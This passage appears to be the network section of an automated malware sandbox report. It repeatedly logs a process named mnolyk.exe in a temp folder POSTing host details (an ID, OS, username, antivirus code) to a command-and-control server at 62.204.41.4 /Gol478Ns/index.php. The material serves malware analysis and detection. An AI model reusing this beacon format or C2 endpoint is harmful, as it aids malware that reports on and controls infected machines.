                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:22.179243088 CET382INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:22 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            194192.168.2.44988962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:22.355001926 CET383OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:22.419462919 CET383INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:22 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            195192.168.2.44989062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:22.601346016 CET384OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:22.668294907 CET384INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:22 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            196192.168.2.44989162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:22.836955070 CET385OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:22.902255058 CET385INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:22 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            197192.168.2.44989262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:23.070647001 CET386OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:23.136850119 CET386INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:23 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            198192.168.2.44989362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:23.319977999 CET387OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:23.386676073 CET387INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:23 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            199192.168.2.44989462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:23.560698986 CET388OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:23.625539064 CET388INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:23 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            2192.168.2.44969762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:24.898910999 CET122OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:24.963576078 CET137INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:24 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            20192.168.2.44971562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:29.307543993 CET209OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:29.370520115 CET209INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:29 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            200192.168.2.44989562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:23.802201986 CET389OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:23.868381023 CET389INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:23 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            201192.168.2.44989662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:24.036973953 CET390OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:24.104918957 CET390INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:24 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            202192.168.2.44989762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:24.270543098 CET391OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:24.334826946 CET391INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:24 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            203192.168.2.44989862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:24.505532980 CET392OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:24.570554018 CET392INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:24 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            204192.168.2.44989962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:24.742098093 CET393OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:24.806658030 CET393INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:24 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            205192.168.2.44990062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:24.979264975 CET394OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:25.047982931 CET394INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:25 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            206192.168.2.44990162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:25.224383116 CET395OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:25.288897038 CET395INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:25 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            207192.168.2.44990262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:25.464004993 CET396OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:25.530391932 CET396INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:25 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            208192.168.2.44990362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:25.713449001 CET397OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:25.777148962 CET397INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:25 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            209192.168.2.44990462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:25.945307016 CET398OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:26.009787083 CET398INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:25 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            21192.168.2.44971662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:29.564268112 CET210OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:29.629133940 CET210INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:29 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            210192.168.2.44990562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:26.197218895 CET399OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:26.263432026 CET399INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:26 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            211192.168.2.44990662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:26.442985058 CET400OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
